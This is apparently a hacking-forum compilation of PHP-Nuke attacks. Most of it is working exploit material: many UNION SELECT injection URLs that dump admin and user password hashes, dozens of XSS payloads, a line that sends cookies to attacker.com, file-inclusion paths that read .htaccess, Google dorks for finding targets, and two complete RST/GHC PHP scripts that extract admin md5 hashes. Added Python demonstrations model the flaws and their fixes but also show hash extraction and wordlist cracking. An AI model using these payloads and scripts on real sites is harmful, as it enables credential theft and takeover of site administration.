Overview of PHP-Nuke vulnerabilities.

[SQL-Injection]
PHP-Nuke <= 8.0 Final (HTTP Referers) Remote SQL Injection Exploit
PHP-Nuke <= 8.0 Final (INSERT) Remote SQL Injection Exploit
PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)
PHP-Nuke <= 7.9 (Encyclopedia) Remote SQL Injection Exploit
PHP-Nuke 7.5 - 7.8 (Search) Remote SQL Injection Exploit
PHP-Nuke <= 7.8 Search Module Remote SQL Injection Exploit
PHP-Nuke 7.8 SQL Injection / Remote Command Execution Exploit
PHP-Nuke <= 7.8 (modules.php) SQL Injection Exploit

[Remote File Inclusion]
PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability
PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions

[XSS]
PHP-Nuke versions: 8.0 (by ettee)
Example:
Code:
[target]/modules.php?name=Search&query=<script+src=http://someshit.net/xss.jpg+
xss.jpg (a JavaScript file served under a .jpg name):
alert (document.cookie);

PHP-Nuke versions: 7.8
Example:
Code:
http://site.com/?pagetitle=title

[Modules Vulns]
PHP-Nuke NSN Script Depository 1.0.0 Remote Source Disclosure Vuln
PHP-Nuke addon Nuke Mobile Entertainment LFI Vulnerability
PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit
PHP-Nuke Module Eve-Nuke 0.1 (mysql.php) RFI Vulnerability
PHP-Nuke Module Addressbook 1.2 Local File Inclusion Exploit
PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln
PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion Exploit
PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability
PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
PHP-Nuke NukeAI Module 3b (util.php) Remote File Include Exploit

[DB Structure]
(cms)
Code:
[nuke_authors]
name
email
pwd
radminsuper
The pwd column stores md5(password); radminsuper=1 marks the super admin.

(forum)
Code:
[nuke_users]
username
user_email
user_icq
user_password
user_newpasswd
The user_password column stores md5(password).

[Default Paths]
Admin:
Code:
[target]/admin.php
Config:
Code:
[target]/config.php
PHP-NUKE NukeSentinel Module

Vulnerabilities in the autohtml.php and autohtml0.php scripts, in the filename parameter.

[Local File Inclusion]
PHP:
http://site/autohtml.php?filename=../file.php
http://site/autohtml0.php?filename=../file.php

[Information Leakage]
PHP:
http://site/autohtml.php?filename=../.htaccess
http://site/autohtml0.php?filename=../.htaccess

The local include can be used to find sensitive information on the server. In particular, when NukeSentinel is in use, .htaccess reveals the site settings, including the full filesystem path (which is also a full path disclosure). It also reveals the path to NukeSentinel's configuration, from which admin logins and password hashes can be obtained.

[Full path disclosure]
PHP:
http://site/autohtml.php?filename=12345

On some sites running this script, where error output has not been disabled, requesting a non-existent file produces an error message containing the full path to the script.

(c) MustLive <mustlive_(at)_websecurity.com.ua>
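An added example, not MustLive's code or NukeSentinel's: it models the two things the post above combines, an include path built straight from the filename parameter (so ../.htaccess walks out of the template directory) and an error message that echoes the full path, next to a contained version. The directory layout, the .html-only allowlist and the "No such page." reply are assumptions made for the demonstration.

```python
import os
import tempfile

# Layout constructed for the example: a template directory used by an
# autohtml-style script, and one level above it the .htaccess the PoC reads.
def make_fixture():
    root = tempfile.mkdtemp()
    templates = os.path.join(root, "autohtml")
    os.mkdir(templates)
    with open(os.path.join(templates, "intro.html"), "w") as f:
        f.write("<h1>welcome</h1>")
    with open(os.path.join(root, ".htaccess"), "w") as f:
        f.write("php_value include_path /var/www/site/includes\n")
    return templates


def resolve_template(base_dir, filename):
    """Return the real path of base_dir/filename, or None if it leaves base_dir.

    realpath() collapses '..' and symlinks, so '../.htaccess' and absolute
    names resolve outside base_dir and are rejected. The extension allowlist
    (an assumption for this example) also blocks including a sibling .php file.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:          # different drives on Windows
        inside = False
    if not inside or not target.endswith(".html"):
        return None
    return target


def autohtml_vulnerable(base_dir, filename):
    """What the vulnerable pattern amounts to: open base_dir/filename as given,
    and on failure echo an error that contains the full path."""
    path = os.path.join(base_dir, filename)
    try:
        with open(path) as f:
            return f.read()
    except OSError as e:
        return f"Warning: include({path}): {e.strerror}"   # full path disclosure


def autohtml_fixed(base_dir, filename):
    """Contained version: resolve and check first, answer generically on any miss."""
    path = resolve_template(base_dir, filename)
    if path is None or not os.path.isfile(path):
        return "No such page."   # same reply for traversal attempts and typos
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    tpl = make_fixture()
    for name in ("intro.html", "../.htaccess", "12345", "/etc/passwd"):
        print(repr(name), "->", autohtml_vulnerable(tpl, name)[:60], "|", autohtml_fixed(tpl, name))
```

The generic reply matters as much as the path check: the post's third PoC only works because the error text carries the script's absolute path.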
XSS
Code:
modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253c/script>bar
modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script>
modules.php?name=Reviews&rop=postcomment&title=%253cscript>alert%2528document.cookie);%253c/script>
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=<body onload=document.title=1337>
modules.php?name=Downloads&op=search&query=><script>alert('ARIA')</script><
modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=
modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>
modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays=
modules.php?name=Journal&file=friend&jid=2&yun=
modules.php?name=Journal&file=friend&jid=2&ye=
modules.php?name=Journal&file=add&filelist[]=
modules.php?name=Journal&file=modify&filelist[]=
modules.php?name=Journal&file=delete&jid=&forwhat=waraxe
modules.php?name=Journal&file=comment&onwhat=
modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=
modules.php?name=Encyclopedia&op=terms&eid=1<r=
modules.php?name=Encyclopedia&op=content&tid=774&page=2&query=
modules.php?name=Encyclopedia&file=search&eid=
modules.php?name=Encyclopedia&file=search&query=f00bar&eid=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&url_title=foobar&url=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&cover=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&rlanguage=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&hits=
modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=
modules.php?name=Reviews&rop=savecomment&uname=&id=8&score=9
modules.php?name=News&file=article&sid=1&optionbox=
modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=
modules.php?name=Stories_Archive&sa=show_month&year=&month=05&month_l=May
modules.php?name=Stories_Archive&sa=show_month&year=2004&month=&month_l=May
modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=&order=0&thold=0
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=0
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=
modules.php?name=NukeJokes&func=CatView&cat=
modules.php?name=NukeJokes&func=JokeView&jokeid=
modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=
modules.php?name=Downloads&d_op=viewsdownload&sid=
modules.php?name=Search&sid=
modules.php?name=Search&query=*&max=
modules.php?name=Search&query=waraxe&sel1=[xss]&type=comments
modules.php?name=Search&a=6&query=*&match=
modules.php?name=Search&query=*&mod3=
modules.php?name=Calendar&file=submit&type=
modules.php?name=Calendar&file=submit&op2=Preview&day=
modules.php?name=Calendar&file=submit&op2=Preview&month=
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our query]
modules.php?name=NukeJokes&func=CatView&cat=[xss code here]
modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code here]
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=users&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=comments&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=stories&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=reviews&category=2
modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=45435[XSS]
banners.php?op=EmailStats&login=[our_login]&cid=1&bid=
modules.php?name=Encyclopedia&file=index&op=terms&eid=1<r=

PHP:
<html>
<form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=index>
<input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'>
<input type=submit name=sub>
</form>
<script>document.searchform.sub.click()</script>
</html>

Search Module (all versions)
<img src=http://www.microsoft.com/404.jpg style=display:none onerror=alert(document.cookie) <
<iframe src=http://www.google.com style=display:none onload=alert(document.cookie) <

Poll and News Module
PHP:
<img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+document.cookie);"

SQL injection:
Code:
modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*
modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors
modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors
modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users
modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20FROM%20nuke_users/*
modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,user_email,user_level,0,0%20FROM%20nuke_users
modules.php?name=Downloads&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*
modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*
modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors
modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors
modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1

Full Path Disclosure
Code:
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=oob&date=00b
/modules/Web_Links/voteinclude.php
/modules.php?name=Statistics&op=convert_month
/modules.php?name=Journal&file=add&filelist=oob
/modules.php?name=Journal&file=modify&filelist=oob
/db/db.php
index.php?inside_mod=1
/modules.php?name=Downloads&d_op=menu
/modules.php?name=Web_Links&l_op=menu
modules.php?name=Web_Links&l_op=viewlink&cid=1&show=oob
modules/NukeJokes/mainfunctions.php
modules.php?name=NukeJokes&func=JokeView&jokeid=oob
modules.php?name=NukeJokes&func=CatView&cat=oob
modules.php?name=Downloads&d_op=viewdownload&cid=2&show=oob
modules/Calendar/config.php
modules/Calendar/index.php
/modules/Calendar/submit.php
error.php?newlang=foobar
modules/coppermine/include/crop.inc.php
modules/coppermine/ecard.php
modules/coppermine/displayecard.php
modules/coppermine/db_input.php
modules/coppermine/config.php
modules/coppermine/addpic.php
modules/coppermine/phpinfo.php
modules/NukeJokes/mainfunctions.php
modules.php?name=NukeJokes&func=JokeView&jokeid=foobar
modules.php?name=NukeJokes&func=CatView&cat=foobar
modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho
modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1

dork:
"create the Super User" "now by clicking here"
inurl:"modules.php?name=" inurl:Web_Links|inurl:downloads|inurl:Your_Account
intext:"Thank you for trying PostNuke" intitle:"PostNuke Installation"
"Warning: setlocale()" intitle:PHP-nuke.powered.site
"create * Super User" "now * clicking here"
"Powered by PHP-Nuke" Copyright © 2003 by PHP-Nuke
"allinurl:modules.php sgallery"
"powered by phpnuke 6.0"
intitle:"PHP-Nuke Powered Site"
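An added example (not code from the post above or from PHP-Nuke) that reproduces, against an in-memory SQLite copy of the nuke_authors / nuke_seccont layout, what every UNION SELECT line in the list does: the Sections artid value is pasted into the query, the attacker's UNION lines it up with the five columns of the real SELECT, and the admin's aid and md5 hash come back in the article body. It also shows the "::aid::hash::" marker trick the RST/GHC exploit further down uses to pull the hash out of the HTML, a wordlist check against the md5(pwd) storage described in the overview, and the parameterised query that stops all of it. The table columns, the 'God'/'s3cret' admin record and the render function are constructed for the example; MySQL's CONCAT is spelled with || here because SQLite has no CONCAT.

```python
import hashlib
import re
import sqlite3

# Constructed fixture, not data from any real site. nuke_authors holds the
# admin (pwd = md5(password), radminsuper = 1); nuke_seccont is the Sections
# article table, with five columns to match the "0,0,aid,pwd,0" PoC above.
ADMIN_PASSWORD = "s3cret"
ADMIN_HASH = hashlib.md5(ADMIN_PASSWORD.encode()).hexdigest()

# Marker regex from the RST/GHC exploit: ::aid::md5::
MARKER_RE = re.compile(r"::([^:]*)::([a-f0-9]{32})::")


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE nuke_authors(aid TEXT, email TEXT, pwd TEXT, radminsuper INTEGER);
        CREATE TABLE nuke_seccont(artid INTEGER, secid INTEGER, title TEXT,
                                  content TEXT, counter INTEGER);
        """
    )
    db.execute("INSERT INTO nuke_authors VALUES ('God', 'admin@example.invalid', ?, 1)",
               (ADMIN_HASH,))
    db.execute("INSERT INTO nuke_seccont VALUES (1, 1, 'Hello', 'first article', 0)")
    return db


def view_article_vulnerable(db, artid):
    """The PHP-Nuke pattern: the artid request parameter is pasted into the SQL."""
    sql = ("SELECT artid, secid, title, content, counter FROM nuke_seccont "
           "WHERE artid=" + artid)
    return db.execute(sql).fetchall()


def view_article_fixed(db, artid):
    """Hardened form: cast to int and bind; the value can never become SQL."""
    try:
        artid = int(artid)
    except ValueError:
        return []
    sql = ("SELECT artid, secid, title, content, counter FROM nuke_seccont "
           "WHERE artid=?")
    return db.execute(sql, (artid,)).fetchall()


def render_article(rows):
    """Minimal stand-in for the HTML the module prints for each row."""
    return "".join(f"<b>{r[2]}</b><br>{r[3]}<br>" for r in rows)


def extract_credentials(html):
    """Pull aid and hash back out of the page via the :: markers."""
    m = MARKER_RE.search(html)
    return (m.group(1), m.group(2)) if m else None


def crack_md5(digest, candidates):
    """Hash = md5(pwd): a plain wordlist lookup recovers a weak admin password."""
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


# Same shape as the Sections artid PoC, carrying the RST/GHC marker
# (MySQL: CONCAT('::',aid,'::',pwd,'::'); SQLite spells it with ||).
PAYLOAD = ("-1 UNION SELECT 0,0,0,'::'||aid||'::'||pwd||'::',0 "
           "FROM nuke_authors WHERE radminsuper=1")

if __name__ == "__main__":
    db = build_db()
    page = render_article(view_article_vulnerable(db, PAYLOAD))
    print("vulnerable:", extract_credentials(page))
    print("fixed:     ", view_article_fixed(db, PAYLOAD))
    print("cracked:   ", crack_md5(ADMIN_HASH, ["password", "admin", "s3cret"]))
```

The column count is the only thing an attacker has to get right, which is why the PoCs pad with 0, 1, 4, null and so on; the marker just makes the hash findable in whatever HTML the module wraps around it.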
PHP-Nuke <= 8.0 (sid) Remote SQL Injection

Vulnerable: PHP-Nuke <= 8.0

Exploit:
Code:
<?php
##########################################################
#              UNPUBLISHED RST/GHC EXPLOIT
# PHP Nuke `sid` sql injection exploit for Search module
# POST method - the best for version 8.0 FINAL
# (c)oded by Foster & 1dt.w0lf
##########################################################
# tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions
##########################################################

if (isset($_POST['Submit'])) {
    $result = sendit('CONCAT("::",aid,"::",pwd,"::")');
    // If the injected query wrapped aid/pwd in "::" markers, pick them out.
    if (preg_match("/::([^:]*)::([a-f0-9]{32})::/", $result, $matches)) {
        $ahash = $matches[2];
        $aname = $matches[1];
    }
}

// Sends the form's POST body (the injected `sid` lives in $_POST['sql_text'])
// and returns the raw HTTP response. $param is accepted but not used: the
// query text comes entirely from the "SQL query" form field.
function sendit($param)
{
    $prefix     = $_POST['prefix'];
    $data       = $_POST['sql_text'];
    $host       = $_POST['hostname'];
    $page       = (isset($_POST['dir'])) ? '/' . $_POST['dir'] : '';
    $page      .= '/modules.php?name=Search';
    $method     = $_POST['method'];
    $ref_text   = $_POST['ref_text'];
    $user_agent = $_POST['user_agent'];
    $result     = '';

    $sock = fsockopen($host, 80, $errno, $errstr, 50);
    if (!$sock) die("$errstr ($errno)\n");
    fputs($sock, "$method $page HTTP/1.0\r\n");   // $page already starts with '/'
    fputs($sock, "Host: $host\r\n");
    fputs($sock, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($sock, "Content-length: " . strlen($data) . "\r\n");
    fputs($sock, "Referer: $ref_text\r\n");
    fputs($sock, "User-Agent: $user_agent\r\n");
    fputs($sock, "Accept: */*\r\n");
    fputs($sock, "\r\n");
    fputs($sock, "$data\r\n");
    fputs($sock, "\r\n");
    while (!feof($sock)) {
        $result .= fgets($sock, 8192);
    }
    fclose($sock);
    return $result;
}
?>
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1251">
<TITLE>RST/GHC PHP Nuk'em exploit</TITLE>
<style>
a:link{color: #000000; text-decoration: none;}
a:visited{color: #000000; text-decoration: none;}
a:hover,a:active{color:#e49a34; text-decoration:underline;}
table{color:#000000;font-family:verdana;font-size:8pt;}
.style2 { color: #FFFFFF; font-weight: bold; }
.style3 {color: #E39930}
.style5 {color: #000000; font-weight: bold; }
</style>
<body bgcolor="#525254">
<form method=post>
<p class="style2"><font size="3" face="Arial, Helvetica, sans-serif">PHP Nuke <span class="style3">QUERY MANIPULATOR</span> based on <font size="3" face="Arial, Helvetica, sans-serif">`sid` POST sql injection</font> exploit for Search module </font></p>
<table width="900" border="0">
<tr bgcolor="#FFFFFF">
  <td width="12%"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">Parameter</font></strong></td>
  <td width="88%" bgcolor="#FFFFFF"><span class="style5"><font size="2" face="Arial, Helvetica, sans-serif">Value</font></span></td>
</tr>
<tr>
  <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">url </font></strong></td>
  <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input name="hostname" type="text" id="hostname" value="<?=(isset($_POST['hostname'])) ? $_POST['hostname'] : 'nuke.cc'; ?>">
  </font></td>
</tr>
<tr>
  <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">dir</font> </strong></td>
  <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input name="dir" type="text" id="dir" value="<?=(isset($_POST['dir'])) ? $_POST['dir'] : 'phpnuke'; ?>">
  </font></td>
</tr>
<tr>
  <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">referer</font></strong></td>
  <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input type="text" name="ref_text" value="<?=(isset($_POST['ref_text'])) ? $_POST['ref_text'] : 'http://jihad.in.us'; ?>" size="60">
  </font></td>
</tr>
<tr>
  <td bgcolor="E39930">SQL query</td>
  <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input type="text" name="sql_text" value="<?=(isset($_POST['sql_text'])) ? $_POST['sql_text'] : 'query=AAA&topic=&category=0&author=&days=0&type=comments&sid=999999\'/**/UNION%20SELECT%20`pwd`%20as%20title%20FROM%20nuke_authors%20WHERE%20radminsuper=\'1'; ?>" size="80">
  </font></td>
</tr>
<tr>
  <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">user agent</font></strong></td>
  <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input type="text" name="user_agent" value="<?=(isset($_POST['user_agent'])) ? $_POST['user_agent'] : 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)'; ?>" size="60">
  </font></td>
</tr>
<tr>
  <td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">table prefix </font></strong></td>
  <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input name="prefix" type="text" id="prefix" value="<?=(isset($_POST['prefix'])) ? $_POST['prefix'] : 'nuke'; ?>">
  </font></td>
</tr>
<tr>
  <td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">method</font></strong></td>
  <td bgcolor="#999999"><select name="method" size="1" id="method">
    <option value="POST">POST</option>
    <option value="GET">GET</option>
  </select></td>
</tr>
<tr>
  <td bgcolor="E39930"> </td>
  <td bgcolor="#999999"> </td>
</tr>
</table>
<p> <input type="submit" name="Submit" value="rock-n-roll"> </p>
</form>
<font size="2">(c) RST/GHC</font>
<hr size="3">
<?php
// Show the extracted admin credentials when the marker query was used,
// then dump the raw page so the hash can be read off when it was not.
if (isset($ahash)) print "<p>admin: $aname &nbsp; md5: $ahash</p>";
# DEBUG
if (isset($result)) print $result;
?>
# milw0rm.com [2008-01-22]
Remote SQL Injection PHP-Nuke < 8.0

Exploit:
Code:
<?php
error_reporting(E_ERROR);
ini_set("max_execution_time", 0);

echo '
+=========================================+
| RST/GHC unpublished PHP Nuke exploit <8 |
+=========================================+
<+> version <8.0
<+> Tested on 7.9 & 6.0
';

// <host> and <version> are both required (argv[2] is read below).
if ($argc < 3) {
    print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n";
    print "ex.: " . $argv[0] . " phpnuke.org 7\n";
    credits();
    exit;
}

/* few definitions */
if (empty($argv[3])) { $prefix = 'nuke'; }   # define tables prefix
else { $prefix = $argv[3]; }

switch ($argv[2]) {
    case "6":
        // 6.x: sid is used unquoted, so the UNION follows the number directly
        $query = "modules.php?name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60" . $prefix . "_authors%60%20WHERE%20%60radminsuper%60%20='1'";
        $version = 6;
        break;
    default:
        // 7.x: sid is quoted, so the payload opens with ' and leaves the closing quote to the application
        $query = "modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60" . $prefix . "_authors%60%20WHERE%20%60radminsuper%60%20='1";
        $version = 7;
        break;
}

$host = 'http://' . $argv[1] . '/';   # argv[1] - host
$http = $host . $query;
echo '[+] host: ' . $host . "\n" . '[+] nuke version: ' . $version . "\n";
#DEBUG
//print $http . "\n";

$result = file_get_contents($http);
preg_match("/([a-f0-9]{32})/", $result, $matches);
if (!empty($matches[0])) {
    print "Admin's Hash: " . $matches[0];
    // the admin name (selected as bodytext) follows two <br> tags in the article output
    if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match))
        print "\nAdmin's name: " . $match[0];
} else {
    echo "Exploit failed...";
}
credits();

function credits()
{
    print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC";
    print "\n\r+========================================+\n";
    exit;
}
?>
# milw0rm.com [2008-01-22]
PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability

example
Code:
http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid={exploit}

EXPLOIT 1:
Code:
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201

EXPLOIT 2:
Code:
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201

(c)milw0rm.com
PHP-Nuke Module Sections (artid) Remote SQL Injection

SQL Injection
Code:
Example: www.xxx/modules.php?name=Sections&op=viewarticle&artid=(exploit)
Code:
9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2

To find sites with this module:
Code:
allinurl: "<section name>"

(c)
PHP-NUKE Modules Okul v1.0 Remote SQL Injection

SQL Injection
Code:
modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

PHP-Nuke Module Inhalt (cid) SQL Injection

SQL Injection
Code:
modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2
modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2

(c) biyofrm.com
PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection

SQL Injection
Code:
modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

PHP-Nuke Module Siir (id) Remote SQL Injection

SQL Injection
Code:
modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

To find targets:
Code:
allinurl: modules-php-name-Siir

(c) s@bun
PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection

PoC:
Code:
/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability

Exploit 1:
Code:
modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors

Exploit 2:
Code:
modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors

(c) milw0rm.com
Php Nuke "Sell" module SQL Injection ("cid")

SQL Injection
Exploit:
Code:
modules.php?name=Sell&d_op=viewsell&cid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability

SQL Injection
Exploit:
Code:
modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
Passive XSS

XSS
Go to http://rus-phpnuke.com/ and type "><iframe src="javascript:alert(document.cookie);" < into the search field, and you get the cookies.
The XSS from the first post, found by ettee, will not go through there, since GET is strictly filtered, or only with encoding.

Sql inj modules 4nAlbum
File http://rus-phpnuke.com/modules.php?name=Files&go=view_file&lid=198
example:
http://site.name/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=[exploit]
Injection:
-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/1,2,concat(aid,%22:%22,pwd),4,5,6,7/**/from/**/nuke_authors/*where%20admin%20-2/*

PS: the exploits will get you nowhere if you don't encode them properly. ^__^
{c}gibson
